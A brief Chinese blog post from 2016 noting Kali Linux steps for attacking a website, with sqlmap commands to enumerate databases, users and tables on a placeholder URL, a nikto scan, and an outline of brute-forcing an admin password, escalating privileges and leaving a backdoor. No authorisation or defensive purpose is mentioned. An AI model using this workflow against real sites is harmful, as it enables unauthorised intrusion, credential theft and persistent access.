2016-03-21 kali下学习寻找漏洞和攻击测试

使用 sqlmap 扫描某网站网址，寻找潜在漏洞，可进行注入攻击。

1 sqlmap -u http://www.xxxxx.com   --dbs --current-user
2 sqlmap -u http://www.xxxxx.com     --tables

找到可注入漏洞后，破解数据库表的用户名，暴力破解密码，找到adminiter账户，用nikto寻找网站入口。

1 nikto -host  www.xxxx.com

之后逐个分析url，分析网页源代码，找到入口。之后提升权限，留下后门。

posted @ 2016-03-21 20:41 SolarJupiter 阅读(432) 评论(0) 编辑收藏举报

刷新页面返回顶部

SolarJupiter